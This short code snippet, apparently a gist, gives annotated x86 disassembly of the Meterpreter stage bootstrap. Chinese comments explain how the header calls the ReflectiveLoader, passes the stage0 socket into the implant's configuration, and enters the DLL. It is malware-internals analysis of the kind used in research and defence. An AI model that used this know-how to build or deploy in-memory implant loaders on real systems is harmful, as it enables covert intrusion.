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Last active January 5, 2019 09:44
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; meterpreter部分
003d0000 4d dec ebp ; M
003d0001 5a pop edx ; Z
003d0002 e800000000 call 003d0007
003d0007 5b pop ebx ; ebx = PE机制+0x7
003d0008 52 push edx ; 恢复栈内存
003d0009 45 inc ebp ; 恢复ebp
003d000a 55 push ebp
003d000b 89e5 mov ebp,esp ; 开辟栈空间
003d000d 81c364130000 add ebx,1364h ; ebx = ReflectiveLoader()的绝对地址
003d0013 ffd3 call ebx ; call ReflectiveLoader, 返回地址为DllEntryPoint函数地址
003d0015 81c395a60200 add ebx,2A695h ; ebx = 将.data段的某个地方作为_MetsrvConfig配置的存储位置
003d001b 893b mov dword ptr [ebx],edi ; _MetsrvConfig->session->comms_handle = edi, edi为stage0中传递过来的SOCKET
003d001d 53 push ebx ; _MetsrvConfig的地址
003d001e 6a04 push 4 ; fdwReason = DLL_METASPLOIT_ATTACH
003d0020 50 push eax ; hinstDLL
003d0021 ffd0 call eax ; call DllEntryPoint
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